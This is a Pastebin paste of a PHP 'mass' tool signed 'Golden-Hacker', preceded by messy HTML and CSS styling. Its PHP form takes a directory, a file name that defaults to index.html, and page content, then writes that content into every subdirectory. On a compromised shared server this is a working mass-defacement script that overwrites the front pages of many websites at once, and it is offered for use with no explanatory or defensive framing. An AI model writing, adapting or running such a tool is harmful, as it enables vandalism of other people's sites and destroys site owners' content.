Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <head>
- <title># Golden-Hacker Filter Mail List #</title>
- <html>
- <head>
- <style>
- body {
- background-color: #565656;
- }
- </style>
- </head>
- <body>
- <meta http-equiv="content-type" content="text/html; charset=windows-1256" />
- <style type="text/css">
- echo '<html>
- <head>
- <link href="http://dz48-coders.org/indexi/pic/favicon.ico" type="image/x-icon" rel="shortcut icon" />
- <meta name="author" content="Golden-Hacker" />
- <title># Golden-Hacker Filter Mail List #</title>
- <style type=\'text/css\'>
- input[type=submit], input[type=button], input[type=reset]{
- text-align:center;
- background:url(http://i43.tinypic.com/5owgmq.jpg) repeat-x center bottom #666666;
- border:1px solid #4D4D4D;
- color:#FFFFFF;
- border-top-color:#565656;
- padding:4px 6px;
- margin:4px 5px;
- height:16px;
- -moz-box-shadow:0 0 1px black;
- -webkit-box-shadow:0 0 1px black;
- box-shadow:0 0 1px black;
- text-shadow:0 1px black;
- -moz-border-radius:4px;
- -webkit-border-radius:4px;
- -khtml-border-radius:4px;
- border-radius:4px;
- height:23px;
- }
- input[type=text], input[type=password]{
- background:urlhttp://i43.tinypic.com/5owgmq.jpg) repeat-x center bottom #666666;
- border:1px solid #4D4D4D;
- color:#CCCCCC;
- border-top-color:#565656;
- -moz-box-shadow:0 0 1px black;
- -webkit-box-shadow:0 0 1px black;
- box-shadow:0 0 1px black;
- -moz-border-radius:4px;
- -webkit-border-radius:4px;
- -khtml-border-radius:4px;
- border-radius:4px;
- height:18px;
- margin-left: 5px;
- }
- input , textarea , button , body , caption , table ,area , option {
- outline:none;
- transition: all 0.20s ease-in-out;
- -webkit-transition: all 0.25s ease-in-out;
- -moz-transition: all 0.25s ease-in-out;
- border-radius:3px;
- -webkit-border-radius:3px;
- -moz-border-radius:3px;
- //border:1px solid rgba(0,0,0, 0.2);
- /* font-family: \'Gill Sans\', \'Gill Sans MT\', Calibri, \'Trebuchet MS\', sans-serif; */
- }
- input , textarea {
- background: url(\'http://i41.tinypic.com/ibkmd5.png\') repeat scroll 0 0 #8B8B8B;\';
- }
- input , textarea {
- outline:none;
- transition: all 0.20s ease-in-out;
- -webkit-transition: all 0.25s ease-in-out;
- -moz-transition: all 0.25s ease-in-out;
- border-radius:3px;
- -webkit-border-radius:3px;
- -moz-border-radius:3px;
- border:1px solid rgba(0,0,0, 0.2);
- }
- input:focus, textarea:focus {
- outline: 0;
- border-color: rgba(82, 168, 236, 0.8);
- -webkit-box-shadow: inset 0 1px 3px rgba(0, 0, 0, 0.1), 0 0 8px rgba(82, 168, 236, 0.6);
- -moz-box-shadow: inset 0 1px 3px rgba(0, 0, 0, 0.1), 0 0 8px rgba(82, 168, 236, 0.6);
- box-shadow: inset 0 1px 3px rgba(0, 0, 0, 0.1), 0 0 8px rgba(82, 168, 236, 0.6);
- background: url(\'http://i41.tinypic.com/ibkmd5.png\') repeat scroll 0 0 #8B8B8B;\';
- overflow: auto;
- }
- .x1 {}
- .x2 {font-size:13px;
- background-color:green;
- color:black;}
- hr {color:white;}
- a {color:black;}
- #x5 {
- font-family:tahoma;}
- .d1 {color :#C17E0B;
- font-family:tahoma;
- font-size:13px;
- font-weight:bold;}
- #d4 {color:#C17E0B;
- font-family:tahoma;
- font-weight:bold;}
- .style1 {
- text-align: center;
- }
- </style>
- </head>
- </br></br>
- </style>
- </head>
- <body >
- <?php
- echo "<title>Mass By Golden-Hacker</title>";
- echo "<link href='http://fonts.googleapis.com/css?family=Electrolize' rel='stylesheet' type='text/css'>";
- echo "<body bgcolor='black'><font color='white'><font face='Electrolize'>";
- echo "<center><form method='POST'>";
- echo "Dir : <input type='text' name='base_dir' size='50' value='".getcwd ()."'><br><br>";
- echo "File Name : <input type='text' name='file_name' value='index.html'><br><br>";
- echo "Your Index : <br><textarea style='width: 685px; height: 200px;' name='index'>~ [ Index Here] ~</textarea><br>";
- echo "<input type='submit' value='Mass'></form></center>";
- if (isset ($_POST['base_dir']))
- {
- if (!file_exists ($_POST['base_dir']))
- die ($_POST['base_dir']." Not Found !<br>");
- if (!is_dir ($_POST['base_dir']))
- die ($_POST['base_dir']." Is Not A Directory !<br>");
- @chdir ($_POST['base_dir']) or die ("Cannot Open Directory");
- $files = @scandir ($_POST['base_dir']) or die ("oohhh shet<br>");
- foreach ($files as $file):
- if ($file != "." && $file != ".." && @filetype ($file) == "dir")
- {
- $index = getcwd ()."/".$file."/".$_POST['file_name'];
- if (file_put_contents ($index, $_POST['index']))
- echo "$index    <span style='color: green'>OK</span><br>";
- }
- endforeach;
- }
- ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement